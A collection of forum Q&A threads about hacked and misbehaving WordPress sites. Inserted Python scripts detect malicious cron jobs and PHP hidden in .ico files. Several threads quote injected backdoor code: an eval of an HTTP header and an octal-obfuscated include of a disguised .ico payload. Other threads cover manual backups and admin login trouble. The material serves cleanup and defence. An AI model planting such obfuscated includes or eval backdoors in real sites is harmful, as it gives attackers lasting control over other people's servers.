My WordPress website being hacked with code eval($_SERVER['HTTP_81DB2B3']

I have a problem with my website. I got information from Wordfence about my WordPress website getting hacked and found the code eval($_SERVER['HTTP_81DB2B3'], so I removed it, but in a few seconds the code came back. Someone, please help me.

I had something very similar to this. Go to your cPanel and search for "Cron Jobs" and scroll down to see if there are any malicious cron jobs set up. You might have some that look like eval(gzinflate(base64_decode(.... that are essentially causing this to reoccur. This is not a complete fix for the issue, but you'll have to delete those cron jobs to ensure that that line of code doesn't keep reappearing. In addition to that, you'll also need to make sure those cron jobs don't show up again. Use a plugin like Wordfence (suggested above as well) to look for malicious files and, if it helps, replace your home directory (except for wp-content and wp-config) with fresh files.
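A check for the cron persistence described in the answer above, as an added example that is not part of the original post: it parses saved "crontab -l" output and reports every job whose command contains the eval(gzinflate(base64_decode( chain. The function names are assumptions of this example, and the sample crontab with its PLACEHOLDER payload is constructed.

```python
import re

# The obfuscation chain quoted in the answer above. Whitespace and letter case
# are matched loosely because both are trivially varied.
CHAIN = re.compile(r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(", re.I)
ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*\s*=")

def cron_command(line):
    """Return the command of one crontab line, or None if it has none."""
    line = line.strip()
    if not line or line.startswith("#") or ENV_LINE.match(line):
        return None                      # blank, comment or VAR=value
    # "@daily cmd" has one schedule field, normal entries have five.
    fields = 1 if line.startswith("@") else 5
    parts = line.split(None, fields)
    return parts[fields] if len(parts) > fields else None

def suspicious_jobs(crontab_text):
    """Return (line_number, command) for every job that runs the chain."""
    hits = []
    for number, line in enumerate(crontab_text.splitlines(), start=1):
        command = cron_command(line)
        if command and CHAIN.search(command):
            hits.append((number, command))
    return hits

# Constructed sample of "crontab -l" output; the payload is a placeholder.
SAMPLE = """\
MAILTO=""
# nightly backup
30 2 * * * /usr/bin/php /home/example/backup.php
*/5 * * * * php -r 'eval( gzinflate(base64_decode("PLACEHOLDER")));'
@daily php -r 'EVAL(GZINFLATE(BASE64_DECODE("PLACEHOLDER")));'
"""

if __name__ == "__main__":
    for number, command in suspicious_jobs(SAMPLE):
        print(f"line {number}: {command}")
```

Save the account's crontab to a file over SSH or copy it from the cPanel page, then pass its text to suspicious_jobs.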

If your website got hacked, then I guess more than one file was affected by it.
Case 1: If you are able to access the WordPress backend, then I suggest you:
Step 1: Add a plugin called Wordfence Security – Firewall & Malware Scan and scan your website with it.
Step 2: After scanning the site, remove all suspicious code from the site.
Case 2: If you are not able to access the WordPress backend, then you have to update your WordPress manually with the hosting file manager or FTP.
Please note: Please take a backup of your website before making any changes.


How Can I Fix a Hacked Wordpress Website?

I have seen lots of critical errors on my WordPress website. I attached a screenshot below that shows some of these issues. Please look at this and provide some suggestions so that I can fix this problem.
Thank you so much.
Depends how badly broken your site has become.
What is it doing to make you think it's been hacked? Is it just the warnings in the Wordfence scan report?
Before going much further you should for sure grab a backup of your database, wp-config.php, and the contents of the directories wp-content/themes, wp-content/uploads, and wp-content/plugins. Might be a good idea to make a separate backup of the entire WordPress installation directory.
Since you can still access the administration panel, might as well change your password just to be safe. Are there multiple users for your WP installation?
What changes have been made if you click "Details" button in the Wordfence scan?
If you're sure changes to the wp-core files are due to a hack, you can try to repair them using Wordfence's repair feature; it'll restore them to their base WordPress version. But if significant differences are showing for dozens of core files, it might be a good idea to start over with a clean installation of WordPress.
You'll also want to track down what allowed these malicious changes to be made (has an unknown IP logged into your administration panel recently? Are you using a plugin with a known security issue?), or it'll just happen again.

Wordpress site hacked?

It looks like my WordPress site has been hacked. The following code snippet was in index.php and wp-config.php:
<?php
/*6b9bb*/
#include "\057ho\155e/\151nt\145r7\0602/\160ub\154ic\137ht\155l/\167p-\151nc\154ud\145s/\152s/\164in\171mc\145/.\146b4\063d6\0700.\151co";
/*6b9bb*/
I have changed:
WP Admin URL and put strong password username
changed cpanel/FTP password with strong one
Implemented iTheme Security
Updated Wordpress to latest (themes and plugins)
However, the code appeared again. What can be good solutions?
P.S. I am using SiteGround.
Thanks
Yeah someone is including a .ico file (open it with a Text Editor, and you will see it is some php Code and no real ico file)
/home/inter702/public_html/wp-includes/js/tinymce/.fb43d680.ico
Somehow, despite your changes of host and passwords, your hacker is able to get in. Once they are in, they can set up all sorts of backdoors to keep access; any .php file of theirs can do this.
At the moment closing the initial front-door they use is your sole occupation.
Follow the advice in this article:
https://codex.wordpress.org/FAQ_My_site_was_hacked
And then: https://codex.wordpress.org/Hardening_WordPress
Here are some links about backdoors:
http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
http://smackdown.blogsblogsblogs.com/2012/11/14/hacked-on-hostpapa-or-netregistry/
http://ottopress.com/2009/hacked-wordpress-backdoors/
Source: https://wordpress.org/support/topic/wordpress-hacked-strange-files-appears/
Once the site is hacked, in my opinion, resistance is futile. No scan or tool will help you. You'll have to replace all files with fresh downloads. Mostly it's straightforward:
Backup the whole installation (just in case)
Download the complete wp-content/uploads folder
Make a Screenshot or save the page with the currently active plugins
Delete ALL files
Get a fresh wordpress setup and extract it
Download a fresh copy of your theme and child-theme (recreate the previous setup)
Copy the previous wp-config.php to this fresh install, but take a GOOD look at it. Usually it also has some virus/backdoors in it, usually easy to see and remove. Now you're already connected with your DB
Examine the saved uploads folder for files that shouldn't be there, like php files. Then upload it to the new folder
Reinstall all plugins, fresh downloads
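The checks from the two answers above, as an added example that is not part of the original posts: it decodes the octal-escaped include path quoted in the question and walks a WordPress tree for PHP hidden behind a non-PHP extension (like the .ico file) and for PHP files under wp-content/uploads. The function names and the list of PHP extensions are assumptions of this example.

```python
import os
import re
import sys

OCTAL = re.compile(r"\\([0-7]{1,3})")
INCLUDE = re.compile(r'(?:include|require)(?:_once)?\s*\(?\s*"([^"]*)"')
PHP_EXTENSIONS = {".php", ".phtml", ".php5", ".php7", ".phar"}  # assumed list

# The injected line exactly as quoted in the question above.
QUOTED_LINE = r'#include "\057ho\155e/\151nt\145r7\0602/\160ub\154ic\137ht\155l/\167p-\151nc\154ud\145s/\152s/\164in\171mc\145/.\146b4\063d6\0700.\151co";'

def decode_octal(text):
    """Undo PHP double-quoted octal escapes, e.g. \\057 becomes '/'."""
    return OCTAL.sub(lambda m: chr(int(m.group(1), 8) & 0xFF), text)

def hidden_includes(source):
    """Decoded target of every include/require whose path uses octal escapes."""
    return [decode_octal(p) for p in INCLUDE.findall(source) if OCTAL.search(p)]

def suspicious_files(root):
    """Return sorted (relative_path, reason) pairs that need a manual look."""
    findings = []
    for folder, _dirs, names in os.walk(root):
        for name in names:
            full = os.path.join(folder, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            if os.path.splitext(name)[1].lower() in PHP_EXTENSIONS:
                # Uploads should hold media only, never executable PHP.
                if rel.startswith("wp-content/uploads/"):
                    findings.append((rel, "PHP file in uploads"))
                continue
            try:
                with open(full, "rb") as handle:
                    head = handle.read(4096)
            except OSError:
                continue                 # unreadable file, skip it
            # Icons, images and stylesheets have no PHP open tag up front.
            if b"<?php" in head:
                findings.append((rel, "PHP code behind a non-PHP extension"))
    return sorted(findings)

if __name__ == "__main__":
    print(hidden_includes(QUOTED_LINE))
    # Pass the WordPress root (ideally a downloaded copy) as the argument.
    for rel, reason in suspicious_files(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{reason}: {rel}")
```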
I faced this problem too, and step by step I did the steps below:
Cleaning the injected code, manually
Changing all the passwords
Hiding the WP admin dashboard URL
Limiting the login attempts
Installing security plugins (Sucuri, Wordfence security)
Contracting with Sucuri plan
The good thing is to install Wordfence security plugin, run the scan, then you will detect all the files with the injected code and you can clean the injected code manually.
You can also visit this link:
https://naderzad.info/web-development/wordpress-code-injection/

How to manually back up wordpress website

I have never used WordPress before. My boss has given me access to a site which was created using WordPress. Then he asked me how I am going to make sure I don't break the site accidentally. I told him I would create a backup on my local computer so that all my changes can be restored if I mess up.
I have the WordPress dashboard up. How do I back up EVERYTHING? I hear there are two separate things I need to back up. Someone please help me.
PS: I don't think he would like me to do this without the use of additional plugins.
There are two separate things:
Your website database. Simply export all the MySQL tables from the database, which is dedicated to your site.
The site files, everything you've got under WordPress folder, /wp-includes, /wp-content, /wp-admin directories and all files.
This should do it all. You can test on your localhost to make sure it's everything that's necessary.
You can backup your WordPress either from your hosting account (preferable) or from your WP dashboard.
You need to backup two things - all the files (the root of your Wordpress installation) and the database for your WP installation.
Since you only have access to the dashboard, you have to use plugin for this.
Two of my favorite free backup plugins are:
BackupWordpress - https://wordpress.org/plugins/backupwordpress/
BackWPup - https://wordpress.org/plugins/backwpup/
They are intuitive and easy to work with, so you shouldn't have issues.
If you go to the dashboard go to "tools" in the left toolbar. Select "export". On the export page you can report that you want to export "all content". This will get you the items that you need from the server.
Then you need to install wordpress to your machine. You can download that from: https://wordpress.org/download/
Once you have that on your machine you also need a local server to run it and test it. I like WAMP, but it partially depends on your operating system. I suggest the following video to get you up to speed on how to get the localhost set up and running: https://www.youtube.com/watch?v=snFzbPm_RUE
Hope this helps!

Broken Wordpress Admin

I have a client who has asked me to start working on their Wordpress site. The admin page is broken and I do not have access to the database yet (I am trying to track down the previous people who worked on it). It is quite messy, I know.
What I am doing now is migrating pieces over to a new WordPress site using WAMP server just to get it functional, but I am wondering if the solution is simpler than that. Ideally, I would just fix the login, but I have minimal WordPress experience and don't know where to start.
Here is the website: http://fundafighter.com
If you go to http://fundafighter.com/wp-admin you'll notice that it is broken. It reroutes to "login-2", which I don't think is normal. So far I haven't found any folder with that title...
I would log into the site via FTP, check the wp-config.php file for any redirects for wp-login.php. Then, check the .htaccess file for the same. Remove any references.
If you get that page working, and you need to reset the password, I would follow this tutorial through phpMyAdmin:
https://codex.wordpress.org/Resetting_Your_Password#Through_phpMyAdmin

Cannot see changes in Wordpress in FTP client and vice versa

I am having some problems with Wordpress 3.7. I think they may be related and have something to do with a file ownership/rights issue but I am completely stuck.
I am using the default theme and I have uploaded a new header image several times through the WP admin interface. Now that I am happy with the image, I want to delete the old images. Firebug tells me they are in [my wp root]/wp-content/uploads/2014/01. However, in my FTP client, this directory is not visible. I only see [my wp root]/wp-content/uploads/2013.
When I log into the Wordpress admin interface, it tells me I should upgrade to 3.8. When I tell it to go ahead and give it my FTP credentials, it begins but gets stuck at "Verifying the unpacked files…". I get no error messages and when I give up and leave the page, there are no reports about a failed update. It just keeps showing me the "please update" message.
I am using the default theme and want to change style.css. I cannot do this in the theme editor, it tells me I have to make the file writable first, even after I give all the theme files 777 access in my FTP client (which probably is not a good idea). If I edit the file offline instead and then upload it via FTP, this doesn't have any effect. I can even delete the entire file and still nothing changes at the frontend.
I have tried to create a child theme through the FTP client but it does not show up in the WP backend.
The site is on a shared hosting platform. I can't find the details at the moment but it's a fairly regular setup (Linux, Apache, MySQL). I am testing in Firefox and caching is turned off. If I log out, and log back in again: same problems.
It is almost as if I am FTP-ing the wrong computer but I am really not. What am I missing?
Problem solved. I finally asked my hosting provider and as it turns out they had adjusted a few settings, making them too restrictive.
